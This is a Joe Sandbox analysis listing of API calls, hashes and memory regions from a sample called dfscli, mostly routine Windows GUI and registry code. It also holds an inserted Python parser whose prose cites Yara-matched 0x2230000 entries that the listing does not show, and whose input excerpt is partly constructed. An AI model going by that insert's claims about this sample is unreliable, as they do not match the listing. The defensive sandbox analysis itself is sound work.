                                                                  • Opcode ID: 90d6fed022f37205e91faeaac6504b74e0f75d282e9fda82b03ffbdba748a2f0
                                                                  • Instruction ID: b3c49ecfdae2261962f2f72699b3bcc1d5c4594392ee8f9afc26f4e19ff51694
                                                                  • Opcode Fuzzy Hash: 90d6fed022f37205e91faeaac6504b74e0f75d282e9fda82b03ffbdba748a2f0
                                                                  • Instruction Fuzzy Hash: A1A146B1900219DFDB14DFA9D884AEEBBB4FF48304F10452EE919A7391D738A951CFA4
                                                                  APIs
                                                                    • Part of subcall function 00411DA5: GetLastError.KERNEL32(?,00000000,0040F9CC,004108AA,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010,0041200F), ref: 00411DA7
                                                                    • Part of subcall function 00411DA5: FlsGetValue.KERNEL32(?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DB5
                                                                    • Part of subcall function 00411DA5: FlsSetValue.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DDC
                                                                    • Part of subcall function 00411DA5: GetCurrentThreadId.KERNEL32 ref: 00411DF4
                                                                    • Part of subcall function 00411DA5: SetLastError.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411E0B
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414930
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414A2D
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414A86
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414AA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414AC6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                  • String ID: ^@
                                                                  • API String ID: 223281555-3067454934
                                                                  • Opcode ID: 661871ab33832ade7b7aaf52d2a942668b7e032303f44cc99fa12acc2a8bb67a
                                                                  • Instruction ID: d8969bca762c2fff75cd20f14addf9e5daf178b08686a22cb2c5a04f5c96d0d7
                                                                  • Opcode Fuzzy Hash: 661871ab33832ade7b7aaf52d2a942668b7e032303f44cc99fa12acc2a8bb67a
                                                                  • Instruction Fuzzy Hash: 1F61D8B6A40305AFDB14DFA9CC41BABB3B6EFC4354F25412FF5009B281D7B999808B58
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0042184E
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421875
                                                                  • UpdateWindow.USER32(?), ref: 0042188F
                                                                  • SendMessageA.USER32(?,00000121,00000000,?), ref: 004218B3
                                                                  • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004218CD
                                                                  • UpdateWindow.USER32(?), ref: 00421913
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421947
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                  • String ID:
                                                                  • API String ID: 2853195852-0
                                                                  • Opcode ID: b2be0544251454af26a063944dae0fad199999050631c7f4df3474e00c2e4742
                                                                  • Instruction ID: bda951081c485ca147d81411007fe1a190cd778f32f816f53062b6f76fcfd76d
                                                                  • Opcode Fuzzy Hash: b2be0544251454af26a063944dae0fad199999050631c7f4df3474e00c2e4742
                                                                  • Instruction Fuzzy Hash: 2141E4307043519BD731AF26AC84A2BBAF4FFD1758F90092EF48192271C73A8946CB5A
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00406994
                                                                  • GetObjectA.GDI32(00405B22,0000003C,?), ref: 00406A00
                                                                  • lstrlenA.KERNEL32(?), ref: 00406A11
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00406A88
                                                                  • OleCreateFontIndirect.OLEAUT32(00000020,00433CFC,?), ref: 00406AB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                  • String ID:
                                                                  • API String ID: 4082312370-3916222277
                                                                  • Opcode ID: 61b9ff90e36958d84cbc1077bd490824df986479636f83f491aa45025cd70d28
                                                                  • Instruction ID: c4ebfa65322681a217c67680f7c020fd47e848ba818764bf4c75e36be929e26e
                                                                  • Opcode Fuzzy Hash: 61b9ff90e36958d84cbc1077bd490824df986479636f83f491aa45025cd70d28
                                                                  • Instruction Fuzzy Hash: 34417771E002199BCB10EFE5D845AADBBB4BF18308F10817EE556F7291E7388A09CB54
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00428795
                                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00428875
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00428892
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 004288B2
                                                                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004288CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CloseEnumH_prologOpenQueryValue
                                                                  • String ID: Software\
                                                                  • API String ID: 2161548231-964853688
                                                                  • Opcode ID: f4d1ca52cbf1251d97ab6773c42b41e562382329021e483681a562ce626031c5
                                                                  • Instruction ID: 0a6b551ca9cc724c7325d587e2d88eb9b1ee1faeb4156374ebf6c637dd52548d
                                                                  • Opcode Fuzzy Hash: f4d1ca52cbf1251d97ab6773c42b41e562382329021e483681a562ce626031c5
                                                                  • Instruction Fuzzy Hash: 4241C331A001289BDB21EB65DC41EEEB7B9EF49304F9041AEF145A2191CB789A52CF98
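The entries in this listing are easier to triage in bulk than by eye: each one carries the memory region the function was lifted from (the "Offset:" of its Source File), whether that region produced a Yara hit (the 0x2230000 dumps above do, the 0x400000 on-disk image does not), and raw hexadecimal Win32 arguments such as the 80000001 hive handle in the RegOpenKeyA/RegQueryValueA calls just above. The parser below is an added example written for this page, not Joe Sandbox code and not part of the report; the input excerpt is copied from entries on this page, the KEY_*/HKEY_* values are the documented winreg.h constants, and the triage rules (flag Yara-matched regions, name the hive in argument 0 of Reg* calls, decode samDesired at the documented argument position of RegOpenKeyExA/RegCreateKeyExA) are the example's own assumptions. Requires Python 3.9+.

```python
import re
from dataclasses import dataclass, field

# Registry rights from winnt.h / winreg.h, used to decode samDesired arguments.
KEY_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY", 0x10000: "DELETE",
              0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
              0x100000: "SYNCHRONIZE"}
KEY_READ, KEY_WRITE, KEY_ALL_ACCESS = 0x20019, 0x20006, 0xF003F
COMPOSITES = {KEY_ALL_ACCESS: "KEY_ALL_ACCESS", KEY_READ | KEY_WRITE: "KEY_READ|KEY_WRITE",
              KEY_READ: "KEY_READ", KEY_WRITE: "KEY_WRITE"}
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
SAM_ARG = {"RegOpenKeyExA": 3, "RegCreateKeyExA": 5}   # argument index of samDesired (assumed map)

def decode_key_access(mask):
    """Individual rights set in a samDesired DWORD, lowest bit first."""
    return [name for bit, name in sorted(KEY_RIGHTS.items()) if mask & bit]

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)   # (caller, api, module, [args], ref)
    base: int = 0            # "Offset:" of the Source File line, i.e. the region base
    snapshot: str = ""
    yara_match: bool = False
    instr_fuzzy: str = ""    # stays empty when the page cut the entry off

# One "• Api.MODULE(args), ref: ADDR" line, optionally prefixed with the subcall note.
API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-F]+): )?"
                    r"(\S+?)\.([A-Z0-9_.]+)(?:\(([^)]*)\))?,? ref: ([0-9A-F]+)$")
HEX8 = re.compile(r"[0-9A-F]{8}")

def parse_entries(text):
    """Split the listing into one FunctionEntry per 'Instruction Fuzzy Hash' line."""
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip().removesuffix("Download File")   # drop fused link text
        if m := API_RE.match(line):
            caller, api, module, args, ref = m.groups()
            cur.apis.append((caller or "", api, module, args.split(",") if args else [], ref))
        elif m := re.search(r"Source File: \S+, Offset: ([0-9A-F]+)", line):
            cur.base = int(m.group(1), 16)
        elif m := re.search(r"Snapshot File: (\S+)", line):
            cur.snapshot = m.group(1)
        elif line == "Yara matches":
            cur.yara_match = True
        elif m := re.match(r"• Instruction Fuzzy Hash: (\w+)", line):
            cur.instr_fuzzy = m.group(1)
            entries.append(cur)            # this line closes an entry
            cur = FunctionEntry()
    if cur.apis or cur.base:               # entry truncated by the page end
        entries.append(cur)
    return entries

def triage(entries):
    """Per entry: region base, snapshot name, and the notes a reviewer wants first."""
    out = []
    for e in entries:
        notes = ["yara-matched region: unpacked/injected code, not the on-disk PE image"] if e.yara_match else []
        for _, api, _, args, _ in e.apis:
            if not api.startswith("Reg"):
                continue
            if args and HEX8.fullmatch(args[0]) and int(args[0], 16) in HIVES:
                notes.append(f"{api} on {HIVES[int(args[0], 16)]}")
            i = SAM_ARG.get(api)
            if i is not None and i < len(args) and HEX8.fullmatch(args[i]):
                mask = int(args[i], 16)
                notes.append(f"{api} samDesired=0x{mask:X} = "
                             + (COMPOSITES.get(mask) or "|".join(decode_key_access(mask))))
        out.append((f"{e.base:08X}", e.snapshot, notes))
    return out

# Constructed input: three entries copied from this report's listing (the first from the
# Yara-matched 0x2230000 region, the last cut off exactly where the page ends).
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
• Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
Yara matches
• Instruction Fuzzy Hash: 3BE1BEB16243028BC71ADFE4D890A6BB3E6BBC4744F04491DE48ADB348DB74ED15CB92
APIs
• __EH_prolog.LIBCMT ref: 00428795
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00428875
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00428892
• RegCloseKey.ADVAPI32(?,?,?,?,Software\\), ref: 004288B2
• RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004288CE
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
• Instruction Fuzzy Hash: 4241C331A001289BDB21EB65DC41EEEB7B9EF49304F9041AEF145A2191CB789A52CF98
APIs
• RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00429E03
• RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00429E26
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00429E52
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
"""

if __name__ == "__main__":
    for base, snap, notes in triage(parse_entries(REPORT_EXCERPT)):
        print(base, snap, *notes, sep="\n  ")
```

Feed it the whole "APIs / Memory Dump Source / Similarity" listing of a report and it separates the functions that belong to the Yara-matched in-memory region from the MFC-style host code at 0x400000, and turns the 0002001F seen in this page's RegOpenKeyExA/RegCreateKeyExA calls into KEY_READ|KEY_WRITE (the mask used to open and create keys under HKEY_CURRENT_USER\software). Arguments shown as "?" are values the decompiler could not recover, so the decoder only fires when the argument is an eight-digit hex literal.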
                                                                  APIs
                                                                  • GetSystemMenu.USER32(?,00000000,?,?,?,?,?,0042CC28,000000FF), ref: 00403D06
                                                                  • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00403D6D
                                                                  • AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 00403D78
                                                                    • Part of subcall function 00403920: FindResourceA.KERNEL32(?,?,00000006), ref: 0040393A
                                                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 00403DB5
                                                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 00403DC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$AppendMessageSend$FindResourceSystem
                                                                  • String ID: loopback
                                                                  • API String ID: 858472958-3546420730
                                                                  • Opcode ID: 4598b109ee9e33227e9328b0220a52c1a9e23e073aa70865d030f30849e1bb02
                                                                  • Instruction ID: 4823e85a43f7f0f7c6a3d4925acab711e54c1865e72890e5d36366e388cdfcd7
                                                                  • Opcode Fuzzy Hash: 4598b109ee9e33227e9328b0220a52c1a9e23e073aa70865d030f30849e1bb02
                                                                  • Instruction Fuzzy Hash: 26319E71240701ABD324EF65DC45F97B7A8FF84720F408A1EF6569B2D1CBB8A805CB58
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F1BC,00000000,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF), ref: 00429AA6
                                                                  • TlsGetValue.KERNEL32(0043F1A0,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429AC4
                                                                  • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940), ref: 00429B20
                                                                  • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3), ref: 00429B32
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429B3F
                                                                  • TlsSetValue.KERNEL32(0043F1A0,00000000), ref: 00429B6F
                                                                  • LeaveCriticalSection.KERNEL32(0043F1BC,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                  • String ID:
                                                                  • API String ID: 784703316-0
                                                                  • Opcode ID: 594a4808baee31a767fdc62f7c8140403948de5799d907349c6831314b1ca9d7
                                                                  • Instruction ID: 5dddc9971b22e0e1876c0446c64b268f5833d0c7886631e03ddba794b92d443b
                                                                  • Opcode Fuzzy Hash: 594a4808baee31a767fdc62f7c8140403948de5799d907349c6831314b1ca9d7
                                                                  • Instruction Fuzzy Hash: 52319A71700625EFDB20DF56E8C5CAABBA9FF48310B90863EE51A93610C734BD51CB98
                                                                  APIs
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC48
                                                                  • GetParent.USER32(?), ref: 0040CC59
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC7C
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC8E
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0040CC9D
                                                                  • IsWindowVisible.USER32(?), ref: 0040CCB7
                                                                  • GetTopWindow.USER32(?), ref: 0040CCDD
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$LongParentVisible
                                                                  • String ID:
                                                                  • API String ID: 506644340-0
                                                                  • Opcode ID: c70ef7d8c11c9b3d2c2ff62202ba04e1108e68c61368e778a638a0a540840f3a
                                                                  • Instruction ID: 9a1c37ed5188bfc8f33535311d62c0bbdcb57dd72d5f2f5136bb94345a51e9fd
                                                                  • Opcode Fuzzy Hash: c70ef7d8c11c9b3d2c2ff62202ba04e1108e68c61368e778a638a0a540840f3a
                                                                  • Instruction Fuzzy Hash: 3D21B631704725EBE7316B66DC89F1B76AC9F44350F450A3AB906B72E1C63CEC0297A8
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00429E03
                                                                  • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00429E26
                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00429E42
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00429E52
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00429E5C
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseCreate$Open
                                                                  • String ID: software
                                                                  • API String ID: 1740278721-2010147023
                                                                  • Opcode ID: 72d1def7f2d6fdd73a8869adbf3cb73964bbc3421da6f381463cdf1f6bf9f63c
                                                                  • Instruction ID: 4196c354c669fe93409805c9569d3fa6af76ca9127a827bb77615f6dc873523b
                                                                  • Opcode Fuzzy Hash: 72d1def7f2d6fdd73a8869adbf3cb73964bbc3421da6f381463cdf1f6bf9f63c
                                                                  • Instruction Fuzzy Hash: 6B11FB72E00268FBDB21DB96DD84DDFBFBCEF89750F50006AE504A2111D2719E05DB64
                                                                  APIs
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004051E1
                                                                  • GetSystemMetrics.USER32(00000000), ref: 004051F9
                                                                  • GetSystemMetrics.USER32(00000001), ref: 00405200
                                                                  • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00405226
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                  • String ID: B$DISPLAY
                                                                  • API String ID: 2307409384-3316187204
                                                                  • Opcode ID: 01cb16e888f42547f2c344bd68f40c19bd14a3463d0f9075f0a2184348a044af
                                                                  • Instruction ID: e98ffc39238d76ad18c2064865fb770f623c726fedb459cf3e2701fb3375c0a4
                                                                  • Opcode Fuzzy Hash: 01cb16e888f42547f2c344bd68f40c19bd14a3463d0f9075f0a2184348a044af
                                                                  • Instruction Fuzzy Hash: 8D11A371601624ABCF219F659C84A5BBBA8EF09740B8044B6FD05BE185D275D801CFE9
                                                                  APIs
                                                                  • GetMapMode.GDI32(?,00000000,?,?,?,?,00407746,?), ref: 00427E53
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 00427E8D
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00427E96
                                                                    • Part of subcall function 00425FE0: MulDiv.KERNEL32(00407746,00000000,00000000), ref: 00426020
                                                                    • Part of subcall function 00425FE0: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042603D
                                                                  • MulDiv.KERNEL32(Fw@,00000060,000009EC), ref: 00427EBA
                                                                  • MulDiv.KERNEL32(00000000,?,000009EC), ref: 00427EC5
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CapsDevice$Mode
                                                                  • String ID: Fw@
                                                                  • API String ID: 696222070-2650048193
                                                                  • Opcode ID: e3170947b1cc198c57297360878fe5df2dbdc7ddbbd9112fc42464f21816eb6e
                                                                  • Instruction ID: fb80d5ef7b3a5028a237277ba05e0f2eaaf9dab0768e1b579059bcf110595a45
                                                                  • Opcode Fuzzy Hash: e3170947b1cc198c57297360878fe5df2dbdc7ddbbd9112fc42464f21816eb6e
                                                                  • Instruction Fuzzy Hash: 1711C235700720AFDB219F55DC44C1FBBA9EF84750752042AF98157360C7759D02CB98
                                                                  APIs
                                                                    • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F43
                                                                    • Part of subcall function 00429F15: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F55
                                                                    • Part of subcall function 00429F15: LeaveCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F5E
                                                                    • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399), ref: 00429F70
                                                                    • Part of subcall function 00429916: __EH_prolog.LIBCMT ref: 0042991B
                                                                  • LoadLibraryA.KERNEL32(hhctrl.ocx,004290F1,0000000C), ref: 004228A4
                                                                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 004228B7
                                                                  • FreeLibrary.KERNEL32(?), ref: 004228C7
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLibrary$AddressFreeH_prologInitializeLeaveLoadProc
                                                                  • String ID: HtmlHelpA$hhctrl.ocx$|C
                                                                  • API String ID: 813623328-2960013086
                                                                  • Opcode ID: 76f3623a875863b6600950783369de3e50677ae7417989a49c3df338fd27278c
                                                                  • Instruction ID: 8ff148b5d027a1bd9c09299d9886496cc310a26e86ad88824c01f6ca9606dbec
                                                                  • Opcode Fuzzy Hash: 76f3623a875863b6600950783369de3e50677ae7417989a49c3df338fd27278c
                                                                  • Instruction Fuzzy Hash: A6F04430344311EFD7606F72EE09B177AD4AF08B15F40892EF05BD15A0DBB8C844972A
                                                                  APIs
                                                                  • GetSysColor.USER32(0000000F), ref: 0042548A
                                                                  • GetSysColor.USER32(00000010), ref: 00425491
                                                                  • GetSysColor.USER32(00000014), ref: 00425498
                                                                  • GetSysColor.USER32(00000012), ref: 0042549F
                                                                  • GetSysColor.USER32(00000006), ref: 004254A6
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004254B3
                                                                  • GetSysColorBrush.USER32(00000006), ref: 004254BA
                                                                  Similarity
                                                                  • API ID: Color$Brush
                                                                  • String ID:
                                                                  • API String ID: 2798902688-0
                                                                  • Opcode ID: 5e9fe926aba121c93cda4fa03a08df81998be73ca4ec86a4fc7898ccbcd5bfd0
                                                                  • Instruction ID: 78561b53b6dc26605db7459fdb8494e68ce8eabe85823d8095c3e3f311011118
                                                                  • Opcode Fuzzy Hash: 5e9fe926aba121c93cda4fa03a08df81998be73ca4ec86a4fc7898ccbcd5bfd0
                                                                  • Instruction Fuzzy Hash: 2BF0F871A407489BD730BB729D09B47BAE1FFC4B10F02092EE2818BA90E6B6E0419F44
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Version$MessageRegisterWindow
                                                                  • String ID: MSWHEEL_ROLLMSG
                                                                  • API String ID: 303823969-2485103130
                                                                  • Opcode ID: 05bd7beb7a7556ba018a9a177a96ae2ca3a30c583be59b7c1ae453c514f770bd
                                                                  • Instruction ID: cf2be246d5d97fda33aa8db455070e9bef683d48ca9bcd61a13d8190e2691888
                                                                  • Opcode Fuzzy Hash: 05bd7beb7a7556ba018a9a177a96ae2ca3a30c583be59b7c1ae453c514f770bd
                                                                  • Instruction Fuzzy Hash: 38E0803AA0D13546D7116764BE4476B66A45B54361FD6007BC90143764976C0C878A7E
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(mscoree.dll,0040F0D9,?,00431AC0,00000008,0040F110,?,00000001,00000000,00412FBC,00000003), ref: 0040EF70
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF80
                                                                  • ExitProcess.KERNEL32 ref: 0040EF94
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressExitHandleModuleProcProcess
                                                                  • String ID: CorExitProcess$`#vp,$v$mscoree.dll
                                                                  • API String ID: 75539706-2710989135
                                                                  • Opcode ID: fd8063930fbf66e5889c8e5221376f06f177b086132e45f551b3fdf05346e537
